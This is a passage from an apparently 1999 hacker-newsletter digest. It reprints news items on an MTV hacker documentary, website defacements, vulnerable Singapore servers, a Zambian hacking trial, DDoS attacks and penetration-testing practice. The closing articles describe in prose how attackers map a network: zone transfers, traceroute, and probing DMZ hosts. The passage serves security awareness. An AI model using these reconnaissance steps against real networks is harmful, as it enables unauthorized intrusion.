      basically taken in by MTV and taken advantage of. But by the same token, I 
      don't think these people have a whole lot to do with the hacker community 
      - at least, not from what we could see here. 

      Almost every sentence uttered throughout this program       was a mistruth 
      of one sort or another. Mantis: "People see hackers as some fat kid 
      sitting at home dressed in black... I don't fit the stereotype of a 
      hacker." Well, guess what? You *do* fit the stereotype - MTV's stereotype 
      or else why would they have ignored all of the other people who are part 
      of the hacker world who don't fit into the MTV demographic? It's hard to 
      figure out who was playing who more - these kids or the MTV marketers. 
      Narrator: "At 16, Chameleon left high school and became a superstar of the 
      hacking underground." Yeah, we have superstars in the hacker world just 
      like in the music business - how convenient for MTV. In fact, we don't 
      really care at all about the technology - it's all about personalities. 
      (That was sarcasm in case any MTV people are getting hard reading that.) 

      They seem really happy turning the whole thing into an       episode of 
      COPS while Shamrock and friends walk in slow motion down city streets with 
      blurred faces. They can't get enough of his involvement with drug dealing, 
      as if that has got anything to do with anything. They call him an expert 
      on "phone phreaking" and once again don't back it up in any way. 
      Apparently just walking down a street saying "I have knowledge that many 
      people don't" is enough for MTV to believe you. "Not much is legal about 
      hacking but it's never been easier to do." I'd love to see MTV's 
      definition of hacking. From this show it would appear to be: affiliating 
      with terrorists, taking over the military, moving satellites, and dealing 
      drugs. 

      Serena is once again amazed that Mantis has a copy of       "The Matrix" 
      on his computer. Apparently, she's never had the opportunity to download a 
      file. That's really all there is to it, you know. It's pretty fucking 
      simple and, once again, has got absolutely nothing to do with hacking. But 
      you have to love the mixed up hacker logic that is used to defend copying 
      a movie: "It's all about trading information. Information has to be free. 
      If Big Brother is watching me, why can't he be watched also?" Hello?? The 
      MATRIX?! Copying a pirated movie is somehow striking out at Big Brother? 
      What an insult to the many truly deserving causes that are out there and 
      were passed over for this tripe. 

      The only part of the program with any glimour of what       hacking is 
      about is the section on the L0pht. But they never even bother to get into 
      it, spending less than a minute on the entire group/concept and using the 
      majority of *that* time to portray them as people whose most important 
      ability would be disrupting the entire Internet. 

      Next, Serena follows Shamrock as he attempts to get to       an imprisoned 
      friend's disk before the authorities do. (Didn't we see this plot device 
      in "Hackers"?) Of course we never see the disk, don't get any details 
      about the friend, and learn absolutely nothing about anything in the whole 
      fiasco. But we do get to hear this bizarre exchange: - Serena: "What do 
      you think you can find on this disk?" - Shamrock: "The police! You know, 
      when we're listening to them on the radio, obviously they're transmitting 
      on a radio frequency - we know what frequency they're transmitting on cuz 
      we're receiving it." 

      Maybe a good dose of LSD is the only thing that'll make       sense out of 
      that. 

      "You never know what you're dealing with when it comes       to hacking" 
      is one of the insightful concluding thoughts. You also never know what 
      you're dealing with when you don't do any research into the subject matter 
      or check out your sources. I'm hearing now that Shamrock is claiming he 
      made the whole thing up just to fuck with them. If that's true, MTV 
      certainly got what they deserved by ignoring the advice and warnings of 
      knowledgeable people in order to pursue an utterly fictitious story. But 
      while Shamrock may have thought it was amusing, it was stupid and caused 
      great harm to the community by making people believe this kind of crap. I 
      can only assume that he thought they would actually check the facts before 
      running with the story. Now we all know better. 

      As for Chameleon, all kinds of allegations are thrown around about his 
      dealing with a terrorist. Yet the only "evidence" of this comes from the 
      editor of AntiOnline, who does not exactly have a good reputation when it 
      comes to presenting facts accurately. (MTV hired him as their technology 
      consultant - another detail they kept quiet.) There is absolutely NO 
      EVIDENCE from a credible source that this foreign person he got a check 
      from had anything to do with any terrorist group. All it shows is that 
      someone was monumentally stupid in thinking that paying to hack a web page 
      was a good idea. Again, nothing to do with hacking. Again, the facts were 
      never checked. 

      Mantis: "I've been to the end of the Internet and back - over the course 
      of my years, I've done everything possible." This kid is 19. With a boast 
      like that, I expect him to have found the meaning of life by the time he's 
      30. I say we hold him to it. 

      What's amazing (and indicative of the MTV sleaze once more) is that Mantis 
      isn't shown to be doing anything illegal. In fact, he's the success story, 
      teaching others, staying out of trouble, doing positive things... Yet MTV 
      manages to make him look like a criminal by getting him to say that *IF* 
      he did something illegal he would know how to cover himself. Slick. 

      The whole charade ends with footage of Serena not able to get into her AOL 
      account and saying "my account has been hacked by hackers." She feels 
      "angry and violated." There is irony here - most everyone in the hacker 
      world has the same feeling right now because of MTV's yellow journalism. 
      But once again, there is no evidence to suggest that this "hack" is 
      anything more than a publicity stunt, much like when MTV hacked its own 
      web page a while back to get attention. If there is anything to suggest 
      that Serena herself didn't do this or one of her fellow employees didn't 
      set it up to get the "perfect ending," I sure didn't see it. Changing a 
      password on AOL is not exactly hacking. But since nothing else in this 
      half hour was either, we can hardly be surprised. 

      So the lessons to be learned here are several. The most important being: 
      DON'T TRUST THE MEDIA! Especially the slick and trendy media. They're not 
      interested in the story but rather in being cool and accepted in the 
      industry. If you don't know how to deal with them, they will screw you 
      over and as a result screw over those people you're supposedly speaking on 
      behalf of. Far too many people were getting all excited about MTV doing a 
      piece on Mitnick that they played right into their hands and got 
      crucified. While Kevin was justifiably upset that they cut him out of the 
      program (they claim they just didn't have enough time), I think he'll be 
      happy not to have any affiliation at all with this portrayal. 
      Interestingly, special thanks are given to David Schindler (Kevin's 
      prosecutor) which means that they actually managed to do a rare video 
      interview with him and still decided to shelve it or maybe he gave them a 
      ton of money to just sit on the story. At this point, I'll believe 
      anything. 

      emmanuel 
      
      
      @HWA


26.0  Bush Web Site Defaced 
      ~~~~~~~~~~~~~~~~~~~~~
       
      From HNN http://www.hackernews.com/

      contributed by punkis 
      The web site of presidential candidate George W Bush
      was defaced yesterday and filled with Marxist
      propaganda. Evidently in the rush to switch over from
      Unix to NT the administrators forgot to remove the
      sample .asp files. 

      Associated Press - via Yahoo
      http://dailynews.yahoo.com/h/ap/19991019/tc/bush_hacked_3.html
       
      Wired
      http://www.wired.com/news/politics/0,1283,31986,00.html
       
      Attrition.org - Screen Shot of Defacement
      http://www.attrition.org/mirror/attrition/1999/10/19/www.georgewbush.com/screenshot.jpg
       
      Georgewbush.com 
      http://www.georgewbush.com/
      
      AP;
      
      Tuesday October 19 8:27 PM ET 

      Hackers Alter Bush Campaign Site

      By TED BRIDIS Associated Press Writer 

      WASHINGTON (AP) - Hackers vandalized the campaign Web site for 
      presidential candidate George W. Bush early Tuesday, briefly replacing 
      his photo with an image of a hammer and sickle and calling for ``a new 
      October        revolution.''

      The embarrassing lapse in computer security came the day after the Bush 
      campaign launched what it described as its ``innovative new design'' for 
      its Internet site, www.georgewbush.com.

      ``We have taken steps to make sure this particular problem is fixed, and 
      we are looking at other ways to further secure the site,'' spokeswoman 
      Mindy Tucker said. The campaign was considering whether to formally 
      notify the        authorities, such as the FBI, she said.

      Tucker said the campaign's more sensitive computer operations - such as 
      its e-mail system and contribution records - were protected on other 
      machines and weren't believed to have been compromised.

      The hackers replaced a news story about Bush on the Web site with a note 
      that ``the success or failure of the working class to achieve victory 
      depends upon a revolution (of) leadership.''

      The Web site runs software from Microsoft Corp (Nasdaq:MSFT - news)., 
      called Internet Information Server, that has suffered several serious 
      security problems during the past year. Microsoft has distributed patches 
      in each        case but relies on local computer administrators to 
      install them correctly.

      A review of the Bush Internet site by The Associated Press showed 
      computer files plainly visible that experts recommend deleting for 
      security reasons. One file includes instructions for users to edit Web 
      pages on the site.

      ``It means to me there is no security policy for this site,'' said Russ 
      Cooper, a specialist who runs the popular NTBugtraq discussion group on 
      the Internet to expose security problems. ``It's typically unfortunate 
      that a lot of        these people do not take the time to protect 
      themselves from this kind of embarrassment.''

      Another expert, Weld Pond, said there was ``no question'' that the Bush 
      campaign neglected to remove these remnants of computer code, which made 
      the site vulnerable.

      ``That's probably how they got in,'' said Pond, a consultant with L0pht 
      Heavy Industries of Boston. ``The fact that there are these sample files 
      on there is pretty problematic, meaning they didn't take much effort to 
      secure it.''

      Tucker said the campaign's own investigation found that the altered Web 
      page was accessible by the public for fewer than five minutes before a 
      backup system kicked in and restored the vandalized text with a fresh 
      copy.

      ``The image wasn't subtle,'' said Jeremy Pinnix, a director at a 
      Nashville, Tenn., design company who captured a snapshot of the 
      vandalized Web site. He said he notified the Bush campaign immediately, 
      but ``they didn't really        seem too worried.''

      Before Vice President Al Gore's campaign acquired the Web address for its 
      Internet site, www.algore2000.com, a spokesman said the previous owner 
      published a blurred photo of Gore with the message: ``Should Al Gore        
      be president? It's a little unclear (get it?)''  
      
      Wired;
      
      George W. Bush the Red? by Declan McCullagh

      12:55 p.m. 19.Oct.99.PDT Intruders apparently defaced the official 
      campaign site of Republican presidential candidate George W. Bush early 
      Tuesday, replacing a photo of the Texas governor with a bright red hammer 
      and sickle. 

      Visitors said the modified Web site, which quoted socialist literature 
      and linked to the International Communist League, was visible around 9:15 
      a.m. EDT. 


      Campaign officials spent the morning trying to puzzle out exactly what 
      happened, a task made more difficult by the fact that the Web server 
      automatically copied over the hacked page with the original one. 

      "We're trying to find out whether we had a visitor. Indications are that 
      we had a visitor," said Greg Sedberry, georgewbush.com webmaster. 

      This isn't the first time a presidential contender has been embarrassed. 
      Vice President Al Gore's campaign site was hacked on 10 April. "Gore was 
      broken into in April. That's the only one I know of in the 2000 race," 
      said B.K. DeLong, curator of the defacement archive at attrition.org.

      On Monday, the campaign introduced a newly designed Web site, switching 
      from a single Unix server to multiple computers running Windows NT and 
      Microsoft's Web server. 

      "I inherited that Unix box when I came on board [in July]," Sedberry 
      said. "I took that box and said we need a more robust setup. It was 
      developed from scratch, and that's where the problems can arise."

      The campaign's NT machines are co-located at Austin-based Illuminati 
      Online, which says it hosts 2,000 customer Web sites. 

      "The George W. Bush machines are not under our control. They maintain 
      everything on those machines," said an Illuminati Online engineer. 

      Jeremy Pinnix, webmaster of Nashville-based Anderson Thomas Design, said 
      he noticed the hacked site early Tuesday. 

      "I called them [the campaign] right away. They asked me to do a screen 
      capture and to email it to them. I haven't heard back, but when I 
      refreshed, it had been fixed," he said. 

      "Our first battle plan is to figure out exactly what happened," said 
      campaign spokeswoman Mindy Tucker. "This is obviously a problem that 
      anyone who has a Web site faces." 

      Sedberry said the NT machines are load-balanced, and the master Web 
      server copies files every few minutes to the duplicate ones. 

      "We're going through the whole system saying, 'Are we sure we locked that 
      down?'" said campaign webmaster Sedberry. "We're finishing it up, 
      double-checking, triple-checking. And we'll see." 

      According to a screen snapshot, the hacked site quoted the International 
      Communist League's belief that "we must take the Marxist doctrine of 
      proletarian revolution out of the realm of theory and give it reality." 

      @HWA
      
27.0  Space Rogue, Editor of HNN, on ABC News Webcast Today 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      From HNN http://www.hackernews.com/

      contributed by weld pond 
      Space Rogue from HNN will be interviewed today in a
      live webcast with Sam Donaldson. The subject is "Who
      hacks computers, and why?". Also appearing will be
      William Marlow, executive vice president of Global
      Integrity, a company that advises other companies on
      hackers/crackers. 

      Sam Donaldson Live! - The show will be archived for later viewing       
      http://www.abcnews.go.com/onair/DailyNews/SamDonaldson_Index.html
      
      @HWA
      
28.0  20% of Hosts in Singapore Vulnerable 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by lamer 
      When the local Singaporean newspaper, The Sunday
      Times, asked IT security firm Infinitum to check on the
      vulnerability of local systems they found that fully one
      fifth of .sg address where vulnerable to attack.
      Infinitum's found 13,000 registered .sg addresses with
      almost 8,000 actually connected to the net. The scan
      revealed that of those 8,000 sites 1,833 were running
      with outdated or unpatched software leaving them
      vulnerable to cyber attack. 

      The Straits Times       
      http://web3.asia1.com.sg/archive/st/0/cyb/cyb1_1017.html
      
      OCT 17 1999 
 
      Many servers easy prey to hackers 
 
      A check by an IT security firm reveals nearly 25
      per cent of servers with .sg addresses are using
      flawed software with holes hackers can exploit
      easily
 
      By SAMANTHA SANTA MARIA
 
      MORE than a fifth of nearly 8,000 operational Internet
      servers here are using flawed software that would allow
      hackers to enter in under a minute. 
 
      The 1,833 servers hosting websites which have .sg in
      their addresses are either using old software riddled with
      holes hackers can exploit, or newer software in which
      the holes have not been "patched" with
      security-enhancing updates. 
 
      This is against a backdrop of 70 per cent of the servers
      here using one program or another which is known to
      have security flaws. 
 
      This is what local IT security firm Infinitum found in a
      check done for The Sunday Times. 
 
      The servers include those which host the websites of
      government departments, Internet service providers and
      educational institutions. 
 
      Security consultants said that it is alarming that more
      than a fifth of Singapore's Internet servers are insecure. 
 
      The situation suggests that the people running these
      systems do not know about the security lapses or do not
      know how to fix them. 
 
      They noted that users find faults in Internet server
      software all the time and the software vendors come up
      with remedies, or "patches". 
 
      But there is cause to worry if people looking after
      computer systems here are not spotting the flaws and
      patching them up as and when they are found. 
 
      Mr Tom Cervenka, a US-based network penetrator
      whose job is to test security, said most intrusion
      attempts could be thwarted by site managers who pay
      attention to security issues and update the protection for
      their sites regularly. 
 
      He said: "The problem seems to be a shortage of
      administrators who do this." 
 
      The problem is not exclusive to Singapore, said the
      consultants. 
 
      Security awareness is generally low worldwide. 
 
      A spokesman for an Israeli IT firm, Voltaire, said:
      "Systems administrators don't seem to have a firm grasp
      on security issues, no matter where they are." 
 
      The Sunday Times asked Infinitum to run the check after
      local websites were defaced, and several hackers cited
      the lack of security in Singapore websites as a reason
      for why they are targetted. 
 
      Infinitum's check showed that there are almost 13,000
      websites whose domain name ends with .sg, and of
      these, close to 8,000 are operational. 
 
      It used an easily available program to poll the .sg servers
      on what software was being used to publish their web
      pages. 
 
      The company then assessed the security of the software
      based on known vulnerabilities in the server software. 
 
      It found about 40 per cent of the servers use a freely
      distributed program by a non-profit organisation called
      Apache. 
 
      A Sunday Times check shows that the National
      University of Singapore, the Internal Revenue Authority
      of Singapore and Sony Music's local office are among
      them. 
 
      The second most popular software is Microsoft's
      Internet Information Server. This is used by almost 30
      per cent of the servers here. 
 
      It is understood that the Singapore Management
      University, People's Association and Harry's Bar are
      also among the software's users. 
     
      @HWA
      
      
29.0  Zambia's First Computer Crime Trial 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      The Lusaka, Zambia government's State House web site
      was altered on July 7, 1999 and the intrusion was not
      noticed until 10 days later. Patrick Mkandawire has
      charged and arrested for violating the country's
      Telecommunications Act. His lawyer has argued that
      that law does not apply to his clients crimes. The court
      has yet to make its final ruling in this case. 

      Africa News      
      http://library.northernlight.com/FD19991018120000062.html?cb=0&dx=1006&sc=0#doc
      
      Story Filed: Monday, October 18, 1999 8:12 PM EST 
      LUSAKA (Zambia) (African Eye News Service, October 17, 1999) - Zambia's 
      first computer hacker appeared in a packed Lusaka courtroom this week 
      after he allegedly cracked the government's State House website and 
      replaced President Frederick Chiluba's photo with an unflattering cartoon, 
      African Eye News Service (South Africa) reports. 

      Internet data processing manager Patrick Mkandawire allegedly hacked into 
      the government internet site on July 7 but it took officials ten full 
      days, until July 17, to notice he had replaced Chiluba's official portrait 
      with the "insulting" cartoon. 

      Mkandawire's attorney, Clement Michello, did not deny that his client had 
      hacked the site but insisted that Zambia did not yet have the laws to 
      prosecute anyone for computer hacking. 

      "The country simply doesn't have laws regulating mischief on the internet 
      and my client has therefore been irregularly charged," he said. 

      Mkandawire was charged and arrested for violating the country's 
      Telecommunications Act, which only regulated the activities the 
      state-owned Zambia Telecommunications Company Limited (ZAMTEL). 

      It makes no direct reference to the Internet or websites. 

      Michello conceded that computer hacking was covered by the draft 1998 Law 
      Development Computer Bill but he stressed that the Bill was still being 
      finalised by the country's Law Development Commission and had not yet even 
      been tabled for debate in       Parliament. 

      "How can anyone be charged under a no-existent law? This Bill will only 
      have authority once it has been approved and enacted," he said. 

      The draft Bill provides for the registration of computers and prohibits 
      unauthorised access, alterations or modification of data stored on 
      computers. 

      Warning that any attempt to prosecute Mkandawire using the Bill would be 
      unconstitutional, Michello demanded that all charges against Mkandawire be 
      quashed. 

      "My client should be released immediately," he said. 

      Prosecutor John Katongo rejected Mkandawire's defence, insisting that the 
      Telecommunications Act provided for the establishment of a Communications 
      Authority which was in turn responsible for licensing Internet Service 
      Providers (ISP). 

      The government website, and Chiluba's portrait, was hosted on one of these 
      service providers, Zamnet, and were therefore subject to the law, he said. 

      "Mkandawire has been charged for interfering in the telecommunications 
      service provided by Zamnet and we are therefore fully within our rights to 
      demand that he be punished," said Katongo. 

      The court will rule on Michello's objections to the charges next Monday. 

      Online. 

      Copyright  1999 African Eye News Service. Distributed via Africa News 

      @HWA

30.0  Russian Infowar Debunked 
      ~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Omega 
      Is Russia on the verge of cyber attack as people in the
      FBI and the US Military would have you believe? Or is
      this more saber rattling to secure funding for their
      anti-cyber terrorism efforts? (Definitely a good read.
      Makes you think twice about those comments from
      Michael Vatis and Gen. Hamre.) 

      PBS                                
      http://www.pbs.org/cringely/pulpit/pulpit19991014.html
      
      I'm From the Government, Trust Me
      Why Russia Probably Isn't Invading
      U.S. Government web Sites and
      Even if They are, It Doesn't Matter 

      By Robert X. Cringely 

      Twenty years ago, I was working as an investigator for
      the Presidential Commission on the Accident at Three
      Mile Island. I was trying to help piece together what
      caused that nuclear power plant to almost go kablooey.
      The commission chairman was John Kemeny, inventor of the Basic
      programming language and then president of Dartmouth College. Back then, as
      now, nuclear safety was a hot news item, and the Commission was suffering
      from a news leak. So they called in the security consultants -- men in white belts
      and white shoes who seemed to be always chomping on unlit cigars. The
      consultants installed an elaborate system of monitors and guards meant to keep
      our secrets secret. When asked exactly who they were trying to keep from
      breaking-in to the building, the chief white shoe said, "Why the Washington
      Post, of course." 

      The Post, which had been breaking all those TMI stories, never had a budget
      for burglary. They never needed one. In the case of Three Mile Island, all it took
      was picking up a few bar tabs at some corner dive. But you could never
      convince the security consultants of this, since it would mean that their jobs
      couldn't be justified. And that's the moral of this story: Always consider the
      personal interests of people who say we are in danger and should pay them to
      do something to protect us. 

      What brought all of this back to mind after two decades was reading a number
      of news stories about supposed Russian infiltration of web sites in the U.S.
      government. To read these stories, it sounds pretty dire, like we are enduring a
      Russian cyber invasion. Those complaining seem to be the U.S military and the
      FBI. 

      What a load of hogwash! Read the stories. What secrets have been lost? Well,
      none, but there has been lots of "sensitive data" transferred overseas. Sensitive
      data? What the heck does that mean? It means someone wants us to pay for
      something that doesn't require doing. 

      First let's deal with the difference between secrets and non-secrets. The U.S.
      government is absolutely mad for secrecy. It has hundreds of levels and types of
      secrecy, and has a tendency to declare as secret almost anything it considers to
      have value. Most U.S. secrets aren't worthy of being called secrets, yet they are.
      Is any of this "sensitive data" secret? Is it classified information? No. So the U.S.
      government has already decided that it doesn't really matter who reads this stuff.
      So why should we care, then, if some of the readers are from Russia? 

      U.S. rules say that if something is classified as secret, it can't be held on a
      computer that is reachable over the Internet. 

      So what we have lost apparently has little value, okay, but maybe what so
      worries our spooks is the volume of attacks from Russia or wherever. If that's
      the case, let's consider for a moment how search engines work. Excite, Alta
      Vista, Hotbot, Google, and all the rest use spider programs that go around the
      net, find web content, and drag it back to be indexed. All of these search
      engines -- dozens of them -- claim to be scouring the Internet on a daily basis.
      This means that they access every web server in Russia many times per day.
      Hey, doesn't that sound like an attack? Is Excite invading Russia? It also means
      they access every web server in the U.S. many times per day, including all the
      web servers holding that so-called "sensitive data." Is Alta Vista attacking U.S.
      security? 

      So maybe the Russian Academy of Sciences is developing a search engine. Do
      we have any idea whether it is accessing U.S. web sites that contain other than
      sensitive data? We don't know anything, because it is not in the interest of these
      alarmists to share with us that knowledge. 

      We make information available on the Internet -- a global network -- then raise
      an alarm when that information is actually accessed. What is wrong with this
      picture? 

      Of course, it is okay for us to do it, we are the good guys, remember? The CIA
      and the NSA visit every site they can on every server in every country including
      those we consider friendly. Is the CIA invading Australia? Regularly. 

      Somebody in the FBI or the U.S. military (or both) wants either to expand the
      definition of what is an official secret to include the hot lunch menu at your local
      elementary school, or they want more money for expanding their anti-cyber
      terrorism efforts. That is why these stories appear, not because there is any
      actual threat. This has to do with regulations or appropriations, but it doesn't
      have to do with real security. 

      Information that is declared to be for public consumption ought to be for public
      consumption anywhere. From a data security standpoint, such accesses are
      actually very good. They show us what is of interest to those we are afraid might
      become our enemies. And if those enemies actually DO find a nugget of real
      information in all that HTML, then they will have helped us make our systems
      better the next time. If there is a real data security story worth paying attention
      to, it's the IPv6 debate over whether every Internet packet should indicate the
      very PC upon which it originated. This is another weird situation where privacy
      proponents are up against those who advocate the protection of intellectual
      property. But I think the real situation is far different. Some of it is institutional
      paranoia, sure. But some of it is just busywork: The Internet Engineering Task
      Force decided 128 bits were needed for future Internet addresses, and they just
      couldn't bring themselves to allow any of those bits to go unused. We won't
      actually need 128 bits for decades, maybe centuries, but the idea of allowing
      some of them to just stay set at zero rankles engineers. So just for the heck of it,
      they decided to use 64 of those bits to designate the data source right down to
      the NIC address. 

      Is it stupid? Yes? Should it worry us? No. Our workaround to this point for the
      limitations of IP addressing has been to invent a variety of proxy and
      masquerading systems to allow a bunch of folks on a local area network to
      share a single IP address -- even if that address is dynamically assigned by a
      DHCP server at Earthlink. The same thing will happen with IPv6, though in
      reverse. Somebody will start a business to make all those individual IP
      addresses look like a single address. Problem solved. And you can bet it
      WON'T be solved by anyone with matching white belt and shoes. 
      
      @HWA
       
31.0  Distributed Coordinated Attacks 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by AlienPlague 
      A new style of DOS attacks, dubbed 'distributed
      coordinated attacks' may be the future of denial of
      service attacks. The new attack style, which has been
      seen a 'handful' of times over the past few weeks, are
      harder to detect and stop, mainly because, as the name
      implies, the attacks originate from more than one
      server. 

      ZD Net        
      http://www.zdnet.com/zdnn/stories/news/0,4586,2376768,00.html?chkpt=hpqsnewstest
      
      --------------------------------------------------------------
      This story was printed from ZDNN,
      located at http://www.zdnet.com/zdnn.
      --------------------------------------------------------------
      
      Cyber attacks -- both old and new
      By Robert Lemos, ZDNN
      October 19, 1999 3:53 PM PT
      URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2376768,00.html
      
      ARLINGTON, Va. -- Over the past six weeks, U.S. network servers have come under assault
      by a fundamentally new style of computer attack, said experts here at the National Information
      Systems Security Conference.
      
      Known as "distributed coordinated attacks," this new style is particularly good at defeating
      present-day defenses against those intent on stopping Internet traffic to a particular company or
      Internet service -- a result known as denial of service. 
      
      "It's possible to detect the attack, but it is very hard to block it" using current software, said
      Thomas Longstaff, senior technical researcher for Software Engineering Institute at Carnegie
      Mellon University, during a panel presentation Tuesday. 
      
                          A garden-variety denial-of-service attack uses a single server to attempt
                          to tie up a network's connection, denying its users access to or from the
                          Internet. Distributed coordinated attacks, however, use hundreds or
      thousands of servers co-opted by a malicious programmer to tag-team a single server. Because so
      many servers are used, each attack can be camouflaged as a legitimate connection attempt,
      making it difficult for the victim's intrusion software to identify that it is under attack and impossible
      to identify just who is attacking. 
      
      "Typically, you block the single network address that is attacking you," said Longstaff, whose
      group works with the Computer Emergency Response Team Coordination Center at Carnegie
      Mellon. CERT/CC tracks and responds to network attacks. "By spreading out the attack over a
      large number of addresses, it becomes much harder to deal with." 
      
      A 'handful' of attacks
      Longstaff and others have already locked horns with intruders using the distributed coordinated
      method of attack. In the past six weeks, a "handful of sites" have been attacked, taking them off
      the Internet for an unspecified amount of time, he said. He would not give any more details. 
      
      Getting the access necessary to compromise hundreds of servers is not as difficult as it sounds,
      said Barbara Fraser, consulting engineer to the CTO at Cisco Systems Inc. With "always on"
      connections to the home becoming more and more common, the number of insecure computers
      connected to the Internet full-time is increasing. "With the average home user knowing very little
      about security, this problem is going to get worse," she stressed. 
      
      In addition, hackers are more frequently automating the software used to gain access to systems
      through known exploits. A whole host of programs exist to scan networks connected to the
      Internet for previously discovered security holes that system administrators have not patched. 
      
      Attacks 'lowest common denominator'
      "This method attacks the lowest common denominator in security," said CERT's Longstaff. "It will
      never be hard to find a thousand servers that don't have the most up-to-date patches." In fact,
      prevention may rely more on protecting computers from being used by malicious programmers,
      rather than protecting the target, he said. 
      
      Stephen Cobb, vice president of research and education for InfoSec Labs Inc., stressed that
      network attackers, be they hackers or criminals bent on espionage or terrorism, have only
      temporarily thwarted the security software. "The security arena is a steady progression of more
      sophisticated attacks followed by better defenses," he said. "There is an evolution at work here." 
      
      The conference, put on by the National Institute of Standards and Technology, collects the United
      States' foremost professionals in network security. A glance through the attendee list shows that
      more than one attendee out of every 10 is an analyst for the computer-focused National Security
      Agency. 
      
      @HWA

32.0  Possible Network Intrusion Scenario 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Q Bahl 
      This is a fairly decent article that outlines how an
      intruder might break into a mixed NT/Unix environment.
      It covers zone transfers, DMZ models, password
      sniffing/cracking, nmap, and other well-known tools and
      techniques. The author actually understands that one
      must have root before they can install back doors. 

      Network Computing                  
      http://www.networkcomputing.com/1021/1021ws1.html
      
      Anatomy of a Network Intrusion 

      October 18, 1999
      By Greg Shipley
      Empty Red Bull cans litter the floor, reflecting the warm glow of the 
      monitors. Alongside the sketch boards lie drained liters of Mountain Dew, 
      partially eaten burritos and dozens of 486 machines configured as Linux 
      Beowulf clusters. A Pentium II machine plugged into a seemingly endless line 
      of surge suppressors hums as it continues to brute-force password guesses at a 
      rate of 10 million per second. Only 12 more hours to go...

      All the machines have their lids off--no hard-core geek is ever satisfied 
      with the state of a system. Legal pads are covered with IP addresses, 
      penciled network maps and port numbers. As the attackers' scripts 
      relentlessly scan for the       presence of the recently identified CGI 
      vulnerability, they continue to exchange notes with the crew on IRC 
      (Internet Relay Chat). They figure once they've compromised a few dozen 
      ISPs--creating a network of "stepping stones"--they can forge ahead to 
      their target.

      It's all about buffer space--a disposable safety net with a redo button. 
      If they "own" a dozen machines between them and their target, they can 
      attack with the confidence that only a cyborg in a time machine could ever 
      gather enough       info to snag them--only a handful of organizations 
      have the manpower or expertise to catch intruders who leave no trail. 
      Attack, clean, reattack--and gain as much net space as possible.

      Auditor? Cracker? Strung-out administrator? The roles can be interchanged 
      and the distinction blurred, with one exception: The crackers have the 
      easiest task. They need find only one open doorway; the defenders must 
      check every lock.

      "It takes one to know one" may be clich, but it holds up in the network 
      security arena. Understanding how attackers operate is invaluable--in 
      fact, it's your best defense. The concept of "hacking" into your own 
      network for security       purposes isn't new. Dan Farmer published a 
      paper in 1995 entitled "Securing Your Site by Breaking Into It" 
      (www.fish.com/security/admin-guide-to-cracking.html). Network Computing 
      published a similar article a few years ago (see "Intrusion Detection 
      Provides a Pound of Prevention" at 
      www.networkcomputing.com/815/815ws1.html).

      Many of the time-tested security principles still hold true. However, 
      attackers' tools and talent have taken giant leaps. Each time security 
      products mature, so do attack methodologies, and if you fall behind on 
      either, you're setting       yourself up for a nightmare.

      Cracking Some Myths       Before we even think about sitting down in front 
      of a computer, let's debunk some common assumptions about crackers and 
      excuses for reduced vigilance.

      "We are not a high-profile company--no one is targeting us." You may 
      manufacture industrial-strength toilet seats, but be "next door," in 
      Internet terms, to an e-commerce site performing credit-card processing. 
      Or maybe you have       great bandwidth or juicy servers, or maybe your 
      domain name just sounds cool. It often doesn't matter what your company 
      is or does, intruders can make use of your network even if it isn't their 
      final target.

      "That is a really complicated attack--it would never happen to us." 
      Although experts agree that the successful cracker lies somewhere between 
      script kiddy (able to execute prewritten code, but unable to manufacture 
      new exploit       code) and elite programmer, most are able to pull off 
      fairly sophisticated attacks. Think back to your college years. Imagine 
      spending less time drinking beer and more time in front of your terminal. 
      What level of mischief could you
      achieve? Now add the declining prices of bandwidth and hardware and it's
      no wonder 14-year-olds are drawing visits from the Secret Service.
   
      @HWA                                                                                                                                                                                        
      
33.0  Intrusion Detection Provides A Pound Of Prevention 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
          

      By Mark Abene, Gerald L. Kovacich and Steven Lutz   Attacks on systems and 
      networks have skyrocketed as rapidly changing technology, systems 
      integration, global networks, information warfare and hacker boredom have 
      become prevalent. Is your network next? Have you been hit already? 

      In the past, teams of friendly attackers, known as "Tiger Teams," would 
      test the security of systems and networks. Today, teams like this and 
      friendly attacks by both internal information systems security (InfoSec) 
      staff and       consultancies have branched out. 

      We have put together such a venture. Our team attempts to penetrate a 
      system or an organization's network by taking on the role of attacker. 
      Using an external attack approach, the team typically performs 
      "zero-knowledge"       attacks, meaning the team is given only the name of 
      the target organization. Sometimes the client provides th e team with the 
      names or the types of systems or information management is most concerned 
      about. 

      Targets can include payroll and human resources departments, fund 
      transfers, proprietary data (such as product designs and source code) and 
      customer databases. The clients are varied: manufacturing, health care and       
      pharmaceuticals companies and major financial institutions. Here we 
      discuss our attack and intrusion-detection procedures and offer an 
      approach to intrusion prevention. 

      In addition, we present the methodology used to analyze individual system 
      security and show you how to strengthen intrusion detection using commonly 
      available tools. For more specific information concerning the attack       
      systems and tools used, see "Test Systems and Tools" and "Specific System 
      Attack," on Network Computing Online at 
      www.NetworkComputing.com/815/815ws1.html. 

      Playing the Hacker Our methodology of attack is similar to that of a 
      would-be attacker. It begins with exploring and mapping the target 
      organization's Internet connections. We start with whois queries to the 
      Internet       Network Information Center (InterNIC) to determine domain 
      information, namely Domain Name System (DNS) servers. We attempt to map 
      the internal network topology using DNS queries. Typically, we request a 
      DNS zone transfer from the organization's authoritative name servers. 
      Although most commercial firewalls can block this type of probe, a 
      surprising number of organizations don't implement the block. 

      Next, using traceroute, we try to uncover possible candidates for a 
      firewall host or packet-filtering router, which would reveal itself as the 
      last hop before our probe packets begin to get dropped. We make a note of 
      this       machine's address for reference. 

      With the DNS zone transfers as a guide, we attempt to find supposedly 
      untrusted machines, just outside the firewall. Most administrators are not 
      overly concerned with security on external machines because these are       
      considered sacrificial machines, relegated to a demilitarized zone. 
      However, th ese same administrators open their firewalls to permit any 
